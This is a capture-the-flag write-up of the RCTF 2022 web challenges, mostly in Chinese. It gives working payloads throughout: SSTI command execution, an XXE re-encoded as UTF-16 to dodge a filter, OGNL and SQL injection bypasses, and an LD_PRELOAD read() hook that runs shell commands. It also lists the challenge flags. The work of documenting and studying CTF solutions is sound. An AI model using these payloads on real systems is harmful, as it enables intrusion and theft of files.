
2022RCTF

web wp

easy upload

content在mb_detect_encoding之后要被判断为base64,然后解成乱码,绕过检测,最后写入
后缀经过 mb_detect_encoding 检测为 BASE64 后,通过 mb_strtolower 转换成 pHo=,绕过对 php 后缀的检测

image-20221212155512119

filechecker_mini

https://blog.zeddyu.info/2020/01/08/36c3-web/#other-file

payload

#!/{{config.__class__.__init__.__globals__['os'].popen('nl /flag').read()}}

FLAG:RCTF{Just_A_5mall_Tr1ck_mini1i1i1__Fl4g_Y0u_gOtt777!!!}

ezbypass

  • xxe
  • ognl

ico 后缀的绕过:平时多留意也能发现,用 ; 即可绕过

http://url/index;1.ico

利用 mybatis 的 OGNL 引入单引号绕过登录,然后对 payload 进行 UTF-16LE 或 UTF-16BE 编码以绕过 DOCTYPE 检测

/**
 * Builds the XXE probe used in this write-up and submits it through xxe().
 *
 * The DTD is encoded as UTF-16LE before Base64: the server-side DOCTYPE check
 * presumably matches the literal "<!DOCTYPE" bytes, so the same document in a
 * different encoding is not recognised by it. From the defender's side the
 * lesson is that a keyword/byte-pattern check is not a mitigation for XXE;
 * DTDs and external entities have to be disabled in the parser itself (e.g.
 * the Xerces "disallow-doctype-decl" feature).
 *
 * xxe() is defined elsewhere in the class (not shown here). The String[]
 * argument appears to be the class allow-list that the HTTP payload below
 * sends as "yourclasses" — confirm against the server source.
 */
public static void main(String[] args) throws Exception {
// Minimal DTD with one external entity; only the encoding step below is what
// makes it different from a textbook XXE document.
String payload = "<?xml version=\"1.0\"?>\n" +
"<!DOCTYPE foo [ \n" +
"<!ENTITY xxe SYSTEM \"file:///flag\">]>" +
"<foo>&xxe;</foo>";
// UTF-16LE byte form (UTF-16BE works the same way per the write-up text).
byte[] bytes = payload.getBytes(StandardCharsets.UTF_16LE);
String poc = Base64.getEncoder().encodeToString(bytes);//base64-poc
System.out.println(poc);
String res = xxe(poc,"no",new String[]{"java.io.ByteArrayInputStream","[B","org.xml.sax.InputSource","java.io.InputStream"});
System.out.println(res);
}

payload

password=1${@java.lang.Character@toString(39)}or(1))%23&type=no&poc=PAA%2FAHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA%2FAD4ACgA8ACEARABPAEMAVABZAFAARQAgAGYAbwBvACAAWwAgACAACgA8ACEARQBOAFQASQBUAFkAIAB4AHgAZQAgAFMAWQBTAFQARQBNACAAIgBmAGkAbABlADoALwAvAC8AZgBsAGEAZwAiAD4AXQA%2BADwAZgBvAG8APgAmAHgAeABlADsAPAAvAGYAbwBvAD4A&yourclasses=java.io.ByteArrayInputStream,[B,org.xml.sax.InputSource,java.io.InputStream

FLAG:RCTF{eeezzzzz222bypassss5555ovo}

filechecker_plus

发现能覆盖/bin/file

image-20221211171704296

尝试覆盖为恶意ELF文件却一直报Segmentation Fault错误。直接覆盖为bash脚本

image-20221211173035261

bp里需要去除\r

image-20221211173057232

FLAG:RCTF{III_W4nt_Gir1Friendssssss_Thi5_Christm4ssss~~~~}

ruoyi

反编译jar,github下载源码,sql注入审计流程,搜 ${

image-20221212022626577

createTable的sql语句直接拿来拼接,需要绕过 filterKeyword

image-20221212022824591

SQL_REGEX 中每个关键字后面都跟着一个空格(%20)才会匹配,所以用 select%09 (tab 代替空格) 即可绕过

SQL_REGEX = "select |insert |delete |update |drop |count |exec |chr |mid |master |truncate |char |and |declare ";

image-20221212022907721

payload

create table aaa select%09extractvalue(1,concat(0x7e,substr((select%09flag from flag),1,16),0x7e,database())) as c from flag;

FLAG:RCTF{9848a68fa6f8ff435839acfbb2a0526f}

filechecker_pro_max

  • LD_PRELOAD
  • /etc/ld.so.preload

条件竞争上传 /etc/ld.so.preload ->hook read->劫持/bin/file成功

https://h0mbre.github.io/Learn-C-By-Creating-A-Rootkit/

https://payloads.online/archivers/2020-01-01/1/

hack.c

#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>

#define BUFFER_SIZE 100 /* size of the stack line buffer used when scanning the log file */
#define COMMAND_NUM 5   /* the read() hook runs its command on every COMMAND_NUM-th counted line */

static int called = 0;  /* not referenced anywhere in this listing */
/* Real read(), resolved lazily with dlsym(RTLD_NEXT) inside the hook; NULL until the first hooked call. */
static ssize_t (*old_read) (int fd, void *buf, size_t count);

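/*
 * check_file_line - count the lines of a text file.
 *
 * @filename: path to read. NULL, an unopenable path and an empty file all
 *            yield 0 (the caller cannot distinguish "missing" from "empty",
 *            same as before).
 *
 * Returns the number of lines. A final line without a trailing '\n' counts
 * as one line, and a line of any length counts exactly once. The previous
 * fgets()-based loop counted a line once per BUFFER_SIZE-1 byte piece, so a
 * long line inflated the count; counting '\n' bytes directly avoids that and
 * also copes with embedded NUL bytes.
 */
int check_file_line(const char *filename){
    if (filename == NULL) {
        return 0;
    }

    FILE *fp = fopen(filename, "r");
    if (fp == NULL) {
        return 0;
    }

    int lines = 0;
    int partial = 0;    /* non-zero while bytes have been seen since the last '\n' */
    int ch;
    while ((ch = fgetc(fp)) != EOF) {
        if (ch == '\n') {
            lines++;
            partial = 0;
        } else {
            partial = 1;
        }
    }
    if (partial) {
        lines++;        /* unterminated last line still counts */
    }

    fclose(fp);         /* read-only stream: nothing to flush, return value not needed */
    return lines;
}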

/*
 * add_file_line - append the single line "1\n" to the file at @filename.
 *
 * The file is opened in "a+" mode, so it is created when missing and never
 * truncated. Open failures are ignored silently; the function has no return
 * value and the caller cannot tell whether the line was written.
 */
void add_file_line(char * filename){
    FILE *log = fopen(filename, "a+");
    if (log != NULL) {
        fputs("1\n", log);
        fclose(log);
    }
}

/*
 * read - interposed replacement for read(2), loaded into every process that
 * honours /etc/ld.so.preload once the .so is listed there.
 *
 * Per call: append one line to /tmp/err.log, re-count the file, and on every
 * COMMAND_NUM-th line run `cat /flag` through system(). The real read() is
 * resolved lazily with dlsym(RTLD_NEXT) on first use and every call is
 * forwarded to it, so the fd/buf/count semantics are those of the real read().
 *
 * Review notes (defender's view):
 *  - /tmp/err.log is opened in append mode and never truncated, so it grows by
 *    one line per hooked read() and is a durable on-disk trace of the hook.
 *  - The command also fires whenever the log cannot be opened, because
 *    check_file_line() then returns 0 and 0 % COMMAND_NUM == 0.
 *  - old_read is tested for NULL only before the dlsym() call; a NULL result
 *    from dlsym() would be called through unchecked on the return line.
 *  - Every hooked read() pays two fopen()/fclose() pairs plus a full scan of
 *    the log, a per-call overhead that grows with the log's size.
 */
ssize_t read(int fd, void *buf, size_t count)
{
char * filename = "/tmp/err.log"; /* string literal behind a non-const pointer; only ever passed to fopen() */
int file_lines = 0;

#ifdef DEBUG
printf ("read hooked.\n"); /* compiled in only with -DDEBUG; writes to stdout from inside read() */
#endif

add_file_line(filename);                 /* one "1\n" per hooked call */
file_lines = check_file_line(filename);

if(file_lines % COMMAND_NUM == 0){
system("cat /flag");                     /* COMMAND_NUM-th, 2*COMMAND_NUM-th, ... call (or an unopenable log) */
}

if (old_read == NULL)
old_read = dlsym (RTLD_NEXT, "read");    /* RTLD_NEXT needs _GNU_SOURCE; see the gcc line below the listing */

return old_read (fd, buf, count);
}

编译

gcc hack.c -o hack.so -fPIC -shared -ldl -D_GNU_SOURCE

上传

/etc/ld.so.preload 的内容为 /tmp/hack.so;/tmp/hack.so 的内容为编译出的 hack.so

竞争

image-20221212070432553

FLAG:RCTF{I_Giveeeeeee_Y0oOu_Fl4gsssss_You_G1ve_M3_GirlFriendsssssssssss}